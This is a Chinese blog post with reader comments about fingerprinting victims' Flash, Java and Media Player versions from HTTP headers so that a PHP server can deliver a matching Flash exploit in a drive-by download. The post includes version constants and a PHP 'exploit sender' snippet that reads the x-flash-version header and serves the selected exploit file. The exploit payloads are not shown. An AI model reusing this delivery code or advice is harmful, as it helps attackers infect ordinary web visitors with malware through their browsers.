flash的一个tips

作者:darkne2s
来源:大能寺

好像大牛些都有flash exp了.不过10个人有9个人说不好用。这出乎我的意料。按道理说这个不是人的漏洞应该很好用才是。而且我也经常不定期的收集世界各地的user agent和OS,activex情况.
flash我搜集的情况是超过300台的机器里面在使用flash9-9e的winxp有超过90%.

我看到流传的flash exp要么是用swf来判断版本.要么用js.这样都不是很保险.
其实在Flash 播放flash的时候会发送flash version 的HTTP 头。
x-flash-version,版本号是9,0,16,0这样的.
define(“Flash9”,’9,0,16,0′);
define(“Flash9b”,’9,0,28,0′);
define(“Flash9d”,’9,0,47,0′);
define(“Flash9c”,’9,0,45,0′);
define(“Flash9e”,’9,0,115,0′);

所以可以在php里来判断flash version.而且我估计以后的IE方面的网马都要趋于放于SERVER端。毕竟用JS什么的太不保险。在上次某个漏洞的时候,我开始用php来做 exploit sender.经过不断积累,发现用php做exploit sender确实好处多多。
比如java和media player会在user-agent发送版本等等.

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_05
User-Agent: Windows-Media-Player/11.0.5721.5230

等我有时间,我想分享一下php 作为exploit sender的一些心得.

if(isset($_SERVER[‘HTTP_X_FLASH_VERSION’]))
{
$version = $_SERVER[‘HTTP_X_FLASH_VERSION’];

}else
{
exit();
}
这样就可以判断flash的准确版本.
当然输出得这样:
$exp = knowflashversion(knowversion(),$version);
$filehowbig =filesize($exp);
setcookie(“phpsession”, “xxxx”,time()+43200);
header(“Content-length: $filehowbig”);
header(‘Content-type: application/x-shockwave-flash’);
//header(‘Content-encoding: gzip’);

readfile($exp);

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • 新东西

    昨天晚上中招,呵呵 就是这个漏洞了。。

  • dark clout

    还是想看看SWF的EXP

  • tearsangle

    很喜欢你的BLOG,很有共享精神
    然后是 不知道为什么 你应该在BLOG里面增加一个内部搜索的模块
    有时候要找你BLOG相关文章要跑到google去site:
    平白送了google流量~~~

  • 鬼仔

    左边侧栏有搜索框的啊?你看下。

发表评论